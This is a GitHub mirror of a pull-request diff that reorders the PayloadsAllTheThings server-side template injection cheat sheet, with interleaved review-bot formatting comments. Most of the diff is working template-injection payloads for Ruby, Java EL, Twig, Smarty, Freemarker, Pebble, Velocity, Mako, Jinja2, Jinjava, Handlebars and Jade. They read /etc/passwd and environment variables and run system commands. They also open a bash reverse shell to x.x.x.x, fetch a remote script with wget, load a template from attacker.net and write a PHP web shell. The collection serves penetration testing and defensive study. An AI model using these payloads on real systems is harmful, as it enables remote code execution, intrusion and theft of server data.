mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-12 06:25:28 +00:00
Merge pull request #423 from p0dalirius/master
Alphabetical sort of the technologies + official websites
This commit is contained in:
commit
71988cfb40
@ -6,32 +6,21 @@
|
|||||||
|
|
||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Methodology](#methodology)
|
* [Methodology](#methodology)
|
||||||
* [Ruby](#ruby)
|
* [ASP.NET Razor](#aspnet-razor)
|
||||||
* [Basic injections](#ruby---basic-injections)
|
* [Basic injection](#aspnet-razor---basic-injection)
|
||||||
* [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
* [Command execution](#aspnet-razor---command-execution)
|
||||||
* [List files and directories](#ruby---list-files-and-directories)
|
* [Expression Language EL](#expression-language-el)
|
||||||
|
* [Basic injection](#expression-language-el---basic-injection)
|
||||||
|
* [Code execution](#expression-language-el---code-execution)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Basic injection](#freemarker---basic-injection)
|
||||||
|
* [Code execution](#freemarker---code-execution)
|
||||||
|
* [Handlebars](#handlebars)
|
||||||
|
* [Jade / Codepen](#jade--codepen)
|
||||||
* [Java](#java)
|
* [Java](#java)
|
||||||
* [Basic injection](#java---basic-injection)
|
* [Basic injection](#java---basic-injection)
|
||||||
* [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
|
* [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
|
||||||
* [Retrieve /etc/passwd](#java---retrieve-etcpasswd)
|
* [Retrieve /etc/passwd](#java---retrieve-etcpasswd)
|
||||||
* [Expression Language EL](#expression-language-el)
|
|
||||||
* [Basic injection](#expression-language-el---basic-injection)
|
|
||||||
* [Code execution](#expression-language-el---code-execution)
|
|
||||||
* [Twig](#twig)
|
|
||||||
* [Basic injection](#twig---basic-injection)
|
|
||||||
* [Template format](#twig---template-format)
|
|
||||||
* [Arbitrary File Reading](#twig---arbitrary-file-reading)
|
|
||||||
* [Code execution](#twig---code-execution)
|
|
||||||
* [Smarty](#smarty)
|
|
||||||
* [Freemarker](#freemarker)
|
|
||||||
* [Basic injection](#freemarker---basic-injection)
|
|
||||||
* [Code execution](#freemarker---code-execution)
|
|
||||||
* [Pebble](#pebble)
|
|
||||||
* [Basic injection](#pebble---basic-injection)
|
|
||||||
* [Code execution](#pebble---code-execution)
|
|
||||||
* [Jade / Codepen](#jade--codepen)
|
|
||||||
* [Velocity](#velocity)
|
|
||||||
* [Mako](#mako)
|
|
||||||
* [Jinja2](#jinja2)
|
* [Jinja2](#jinja2)
|
||||||
* [Basic injection](#jinja2---basic-injection)
|
* [Basic injection](#jinja2---basic-injection)
|
||||||
* [Template format](#jinja2---template-format)
|
* [Template format](#jinja2---template-format)
|
||||||
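Review bot: the new `* [Handlebars](#handlebars)` and `* [Jade / Codepen](#jade--codepen)` entries are added without any child entries, although the body still has a `### Handlebars - Command Execution` heading (it appears under `## Handlebars` further down in this diff); since this hunk rewrites the whole table of contents, add `* [Command Execution](#handlebars---command-execution)` under Handlebars so that subsection stays reachable the way the `ASP.NET Razor` and `Java` sub-entries are. The alphabetical order itself (ASP.NET Razor, Expression Language EL, Freemarker, Handlebars, Jade / Codepen, Java, Jinja2) checks out against the headings below.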
@ -45,11 +34,22 @@
|
|||||||
* [Jinjava](#jinjava)
|
* [Jinjava](#jinjava)
|
||||||
* [Basic injection](#jinjava---basic-injection)
|
* [Basic injection](#jinjava---basic-injection)
|
||||||
* [Command execution](#jinjava---command-execution)
|
* [Command execution](#jinjava---command-execution)
|
||||||
* [Handlebars](#handlebars)
|
|
||||||
* [ASP.NET Razor](#aspnet-razor)
|
|
||||||
* [Basic injection](#aspnet-razor---basic-injection)
|
|
||||||
* [Command execution](#aspnet-razor---command-execution)
|
|
||||||
* [Lessjs](#lessjs)
|
* [Lessjs](#lessjs)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Pebble](#pebble)
|
||||||
|
* [Basic injection](#pebble---basic-injection)
|
||||||
|
* [Code execution](#pebble---code-execution)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injections](#ruby---basic-injections)
|
||||||
|
* [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
||||||
|
* [List files and directories](#ruby---list-files-and-directories)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#twig---basic-injection)
|
||||||
|
* [Template format](#twig---template-format)
|
||||||
|
* [Arbitrary File Reading](#twig---arbitrary-file-reading)
|
||||||
|
* [Code execution](#twig---code-execution)
|
||||||
|
* [Velocity](#velocity)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
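Review bot: the Ruby block of the table of contents lists `Basic injections`, `Retrieve /etc/passwd` and `List files and directories` but omits the `### Ruby - Code execution` subsection that the moved Ruby section still carries at the end of this diff; add `* [Code execution](#ruby---code-execution)` under Ruby. The same gap exists for `Lessjs`, whose `### Lessjs - SSRF / LFI` heading has no child entry, while `Mako`, `Smarty` and `Velocity` are leaf entries, so the depth of the list is uneven across engines and a reader cannot tell from it which sections have subsections.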
@ -67,81 +67,34 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
|
|||||||
|
|
||||||
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
|
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true)
|
||||||
|
|
||||||
## Ruby
|
---
|
||||||
|
|
||||||
### Ruby - Basic injections
|
## ASP.NET Razor
|
||||||
|
|
||||||
ERB:
|
[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c)
|
||||||
|
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
|
||||||
|
|
||||||
```ruby
|
### ASP.NET Razor - Basic injection
|
||||||
<%= 7 * 7 %>
|
|
||||||
```
|
|
||||||
|
|
||||||
Slim:
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
#{ 7 * 7 }
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - Retrieve /etc/passwd
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= File.open('/etc/passwd').read %>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - List files and directories
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= Dir.entries('/') %>
|
|
||||||
```
|
|
||||||
|
|
||||||
### Ruby - Code execution
|
|
||||||
|
|
||||||
Execute code using SSTI for ERB engine.
|
|
||||||
|
|
||||||
```ruby
|
|
||||||
<%= system('cat /etc/passwd') %>
|
|
||||||
<%= `ls /` %>
|
|
||||||
<%= IO.popen('ls /').readlines() %>
|
|
||||||
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
|
|
||||||
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
Execute code using SSTI for Slim engine.
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
#{ %x|env| }
|
@(1+2)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Java
|
### ASP.NET Razor - Command execution
|
||||||
|
|
||||||
### Java - Basic injection
|
```csharp
|
||||||
|
@{
|
||||||
```java
|
// C# code
|
||||||
${7*7}
|
}
|
||||||
${{7*7}}
|
|
||||||
${class.getClassLoader()}
|
|
||||||
${class.getResource("").getPath()}
|
|
||||||
${class.getResource("../../../../../index.htm").getContent()}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Java - Retrieve the system’s environment variables
|
---
|
||||||
|
|
||||||
```java
|
|
||||||
${T(java.lang.System).getenv()}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Java - Retrieve /etc/passwd
|
|
||||||
|
|
||||||
```java
|
|
||||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
|
||||||
|
|
||||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Expression Language EL
|
## Expression Language EL
|
||||||
|
|
||||||
|
[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html)
|
||||||
|
> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0
|
||||||
|
|
||||||
### Expression Language EL - Basic injection
|
### Expression Language EL - Basic injection
|
||||||
|
|
||||||
```java
|
```java
|
||||||
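Review bot: the `### ASP.NET Razor - Basic injection` block is fenced as `powershell` although `@(1+2)` is Razor (C#) syntax, and the `### ASP.NET Razor - Command execution` block contains only the placeholder `@{ // C# code }`, so the new section documents no concrete behaviour; tag the first fence `csharp` like the second block and state plainly that the second block is a placeholder, or drop that heading until it has content. The `[Official website]` link followed by a one-line `>` description is a good pattern, but it is not applied uniformly: the Ruby (ERB/Slim) section removed here and re-added at the end of this diff gets neither.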
@ -161,7 +114,6 @@ ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".g
|
|||||||
|
|
||||||
### Expression Language EL - Code Execution
|
### Expression Language EL - Code Execution
|
||||||
|
|
||||||
|
|
||||||
```java
|
```java
|
||||||
// Common RCE payloads
|
// Common RCE payloads
|
||||||
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
||||||
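Review bot: the context heading `### Expression Language EL - Code Execution` capitalises `Execution`, while every other engine uses `Code execution` (Freemarker, Pebble, Twig, Ruby) and the table of contents entry is written `[Code execution](#expression-language-el---code-execution)`; since this PR normalises section order and naming, lower-case it as well. The only change in this hunk is a removed blank line, which is fine.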
@ -190,73 +142,18 @@ ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().g
|
|||||||
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
## Twig
|
|
||||||
|
|
||||||
### Twig - Basic injection
|
|
||||||
|
|
||||||
```python
|
|
||||||
{{7*7}}
|
|
||||||
{{7*'7'}} would result in 49
|
|
||||||
{{dump(app)}}
|
|
||||||
{{app.request.server.all|join(',')}}
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Template format
|
|
||||||
|
|
||||||
```python
|
|
||||||
$output = $twig > render (
|
|
||||||
'Dear' . $_GET['custom_greeting'],
|
|
||||||
array("first_name" => $user.first_name)
|
|
||||||
);
|
|
||||||
|
|
||||||
$output = $twig > render (
|
|
||||||
"Dear {first_name}",
|
|
||||||
array("first_name" => $user.first_name)
|
|
||||||
);
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Arbitrary File Reading
|
|
||||||
|
|
||||||
```python
|
|
||||||
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
|
|
||||||
```
|
|
||||||
|
|
||||||
### Twig - Code execution
|
|
||||||
|
|
||||||
```python
|
|
||||||
{{self}}
|
|
||||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
|
||||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
|
||||||
{{['id']|filter('system')}}
|
|
||||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
|
||||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
|
||||||
```
|
|
||||||
|
|
||||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
POST /subscribe?0=cat+/etc/passwd HTTP/1.1
|
|
||||||
email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
|
||||||
```
|
|
||||||
|
|
||||||
## Smarty
|
|
||||||
|
|
||||||
```python
|
|
||||||
{$smarty.version}
|
|
||||||
{php}echo `id`;{/php} //deprecated in smarty v3
|
|
||||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
|
||||||
{system('ls')} // compatible v3
|
|
||||||
{system('cat index.php')} // compatible v3
|
|
||||||
```
|
|
||||||
|
|
||||||
## Freemarker
|
## Freemarker
|
||||||
|
|
||||||
|
[Official website](https://freemarker.apache.org/)
|
||||||
|
> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
|
||||||
|
|
||||||
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
|
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
|
||||||
|
|
||||||
### Freemarker - Basic injection
|
### Freemarker - Basic injection
|
||||||
|
|
||||||
The template can be `${3*3}` or the legacy `#{3*3}`
|
The template can be `${3*3}` or the legacy `#{3*3}`.
|
||||||
|
|
||||||
### Freemarker - Code execution
|
### Freemarker - Code execution
|
||||||
|
|
||||||
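Review bot: the Twig and Smarty blocks removed here are moved rather than edited, so the broken PHP in `### Twig - Template format` travels with them: `$output = $twig > render (` has lost the `->` arrow and should read `$output = $twig->render(`, and `{{7*'7'}} would result in 49` mixes prose into a code block. Fix both while moving, and consider tagging those fences `twig` or `php` instead of `python`. The Freemarker website link and description look right, and adding the missing period to `or the legacy `#{3*3}`.` is a good catch.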
@ -278,37 +175,44 @@ ${"freemarker.template.utility.Execute"?new()("id")}
|
|||||||
${dwf.newInstance(ec,null)("id")}
|
${dwf.newInstance(ec,null)("id")}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Pebble
|
---
|
||||||
|
|
||||||
### Pebble - Basic injection
|
## Handlebars
|
||||||
|
|
||||||
```java
|
[Official website](https://handlebarsjs.com/)
|
||||||
{{ someString.toUPPERCASE() }}
|
> Handlebars compiles templates into JavaScript functions.
|
||||||
|
|
||||||
|
### Handlebars - Command Execution
|
||||||
|
|
||||||
|
```handlebars
|
||||||
|
{{#with "s" as |string|}}
|
||||||
|
{{#with "e"}}
|
||||||
|
{{#with split as |conslist|}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{this.push (lookup string.sub "constructor")}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{#with string.split as |codelist|}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{this.push "return require('child_process').execSync('ls -la');"}}
|
||||||
|
{{this.pop}}
|
||||||
|
{{#each conslist}}
|
||||||
|
{{#with (string.sub.apply 0 codelist)}}
|
||||||
|
{{this}}
|
||||||
|
{{/with}}
|
||||||
|
{{/each}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
|
{{/with}}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Pebble - Code execution
|
---
|
||||||
|
|
||||||
Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`.
|
|
||||||
|
|
||||||
New version of Pebble :
|
|
||||||
|
|
||||||
```java
|
|
||||||
{% set cmd = 'id' %}
|
|
||||||
{% set bytes = (1).TYPE
|
|
||||||
.forName('java.lang.Runtime')
|
|
||||||
.methods[6]
|
|
||||||
.invoke(null,null)
|
|
||||||
.exec(cmd)
|
|
||||||
.inputStream
|
|
||||||
.readAllBytes() %}
|
|
||||||
{{ (1).TYPE
|
|
||||||
.forName('java.lang.String')
|
|
||||||
.constructors[0]
|
|
||||||
.newInstance(([bytes]).toArray()) }}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Jade / Codepen
|
## Jade / Codepen
|
||||||
|
|
||||||
|
[Official website](https://codepen.io/)
|
||||||
|
>
|
||||||
|
|
||||||
```python
|
```python
|
||||||
- var x = root.process
|
- var x = root.process
|
||||||
- x = x.mainModule.require
|
- x = x.mainModule.require
|
||||||
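Review bot: the `>` blockquote added under the Jade / Codepen `[Official website]` link is empty, and the link points at https://codepen.io/, which covers only the Codepen half of the heading; either give the engine a one-line description like the other sections or drop the empty quote, and consider also linking the template engine's own documentation. The Handlebars section is moved byte-for-byte, including the `{{#with "s" as |string|}}` block, which is what a reordering commit should do.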
@ -320,101 +224,35 @@ New version of Pebble :
|
|||||||
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Velocity
|
---
|
||||||
|
|
||||||
```python
|
## Java
|
||||||
#set($str=$class.inspect("java.lang.String").type)
|
|
||||||
#set($chr=$class.inspect("java.lang.Character").type)
|
### Java - Basic injection
|
||||||
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
|
||||||
$ex.waitFor()
|
```java
|
||||||
#set($out=$ex.getInputStream())
|
${7*7}
|
||||||
#foreach($i in [1..$out.available()])
|
${{7*7}}
|
||||||
$str.valueOf($chr.toChars($out.read()))
|
${class.getClassLoader()}
|
||||||
#end
|
${class.getResource("").getPath()}
|
||||||
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mako
|
### Java - Retrieve the system’s environment variables
|
||||||
|
|
||||||
[Official website](https://www.makotemplates.org/)
|
```java
|
||||||
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
|
${T(java.lang.System).getenv()}
|
||||||
|
|
||||||
```python
|
|
||||||
<%
|
|
||||||
import os
|
|
||||||
x=os.popen('id').read()
|
|
||||||
%>
|
|
||||||
${x}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### Direct access to os from TemplateNamespace:
|
### Java - Retrieve /etc/passwd
|
||||||
|
|
||||||
Any of these payloads allows direct access to the `os` module
|
```java
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
|
|
||||||
```python
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
${self.module.cache.util.os.system("id")}
|
|
||||||
${self.module.runtime.util.os.system("id")}
|
|
||||||
${self.template.module.cache.util.os.system("id")}
|
|
||||||
${self.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.__init__.__globals__['util'].os.system('id')}
|
|
||||||
${self.template.module.runtime.util.os.system("id")}
|
|
||||||
${self.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.__init__.__globals__['os'].system('id')}
|
|
||||||
${self.module.cache.util.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.util.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.module.cache.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.util.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.module.filters.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template.module.cache.util.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.cache.util.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.util.os.system("id")}
|
|
||||||
${self.module.cache.util.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.util.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.template.module.cache.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
|
|
||||||
${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.module.filters.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template._mmarker.module.cache.util.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
|
|
||||||
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
|
|
||||||
${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
|
|
||||||
${self.context._with_template.module.filters.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
|
|
||||||
${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
|
||||||
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
|
||||||
```
|
```
|
||||||
|
|
||||||
PoC :
|
---
|
||||||
|
|
||||||
```python
|
|
||||||
>>> print(Template("${self.module.cache.util.os}").render())
|
|
||||||
<module 'os' from '/usr/local/lib/python3.10/os.py'>
|
|
||||||
```
|
|
||||||
|
|
||||||
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
|
|
||||||
|
|
||||||
## Jinja2
|
## Jinja2
|
||||||
|
|
||||||
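Review bot: the Java section is moved unchanged, so `${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}` under `### Java - Retrieve /etc/passwd` still spells the path `etc/passwd` without the leading slash, which disagrees with the heading and with the second payload in the same block; correct it while moving. The Velocity block removed here (`#set($str=$class.inspect("java.lang.String").type)` onward) does not reappear anywhere visible in this diff, so verify that it lands intact at its new position and, while at it, retag its fence from `python`, since the content is Velocity VTL.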
@ -556,7 +394,6 @@ In another GET parameter include a variable named "input" that contains the comm
|
|||||||
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Jinja2 - Filter bypass
|
### Jinja2 - Filter bypass
|
||||||
|
|
||||||
```python
|
```python
|
||||||
@ -595,8 +432,13 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
|
|||||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Jinjava
|
## Jinjava
|
||||||
|
|
||||||
|
[Official website](https://github.com/HubSpot/jinjava)
|
||||||
|
> Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content).
|
||||||
|
|
||||||
### Jinjava - Basic injection
|
### Jinjava - Basic injection
|
||||||
|
|
||||||
```python
|
```python
|
||||||
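Review bot: Jinjava receives an `[Official website]` link and a `>` description here, but the `## Jinja2` heading shown as context in the preceding hunk is left without either, although the PR title promises official websites for the technologies; add the Jinja2 link and a one-line description for consistency. The `---` separator placed before `## Jinjava` matches the separators inserted before the other top-level sections in this diff, so that part is consistent.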
@ -617,54 +459,16 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||||||
|
|
||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
|
||||||
|
|
||||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
```
|
```
|
||||||
|
|
||||||
## Handlebars
|
---
|
||||||
|
|
||||||
### Handlebars - Command Execution
|
|
||||||
|
|
||||||
```handlebars
|
|
||||||
{{#with "s" as |string|}}
|
|
||||||
{{#with "e"}}
|
|
||||||
{{#with split as |conslist|}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{this.push (lookup string.sub "constructor")}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{#with string.split as |codelist|}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{this.push "return require('child_process').execSync('ls -la');"}}
|
|
||||||
{{this.pop}}
|
|
||||||
{{#each conslist}}
|
|
||||||
{{#with (string.sub.apply 0 codelist)}}
|
|
||||||
{{this}}
|
|
||||||
{{/with}}
|
|
||||||
{{/each}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
{{/with}}
|
|
||||||
```
|
|
||||||
|
|
||||||
## ASP.NET Razor
|
|
||||||
|
|
||||||
### ASP.NET Razor - Basic injection
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
@(1+2)
|
|
||||||
```
|
|
||||||
|
|
||||||
### ASP.NET Razor - Command execution
|
|
||||||
|
|
||||||
```csharp
|
|
||||||
@{
|
|
||||||
// C# code
|
|
||||||
}
|
|
||||||
```
|
|
||||||
|
|
||||||
## Lessjs
|
## Lessjs
|
||||||
|
|
||||||
|
[Official website](https://lesscss.org/)
|
||||||
|
> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles.
|
||||||
|
|
||||||
